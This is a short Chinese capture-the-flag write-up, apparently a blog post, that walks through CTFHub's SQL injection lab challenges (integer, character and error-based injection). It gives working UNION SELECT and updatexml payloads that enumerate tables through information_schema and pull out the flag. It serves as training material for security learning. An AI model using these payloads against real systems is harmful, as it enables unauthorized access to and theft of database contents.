CTFHUB 技能树 SQL 10
ctfhub_web_SQL注入_全通关详解(持续更新中) - FreeBuf网络安全行业门户
整数注入
- 输入1,回显用户
- 输入1 order 2 正常
- 输入1 order 3 错误,说明字段数为2
- 输入-1 union select 1,2
- 或者构造链接/?id=-1%20union%20select%201,2%20--+
- 输入-1 union select database(),database()
- 获得库名
- 输入-1 union select database(),group_concat(table_name) from information_schema.tables where table_schema = "sqli"
- 获得两个表名
- 输入-1 union select database(),group_concat(column_name) from information_schema.columns where table_name = "flag"--
- 列名
- 输入-1 union select database(),group_concat(flag) from sqli.flag--
字符注入
- 输入1 and 1=2不报错,输入1‘报错,判断为字符型注入
- 其余部分和数字注入一样
- 构造链接
- ?id=-1%27+union+select+database%28%29%2Cgroup_concat%28flag%29+from+sqli.flag--+
- 输入-1' union select database(),group_concat(flag) from sqli.flag--
报错注入
- 输入1 and updatexml(1,(concat(1,database())),2)
- 输入
- 1 and updatexml(1,(concat(1,(select group_concat(table_name) from information_schema.tables where table_schema = 'sqli'))),2)
- 其他部分一样
- 最后输入1 and updatexml(1,(concat(1,(select group_concat(flag) from flag))),2),获得flag
分类:
CTFHUB
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· DeepSeek 开源周回顾「GitHub 热点速览」
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了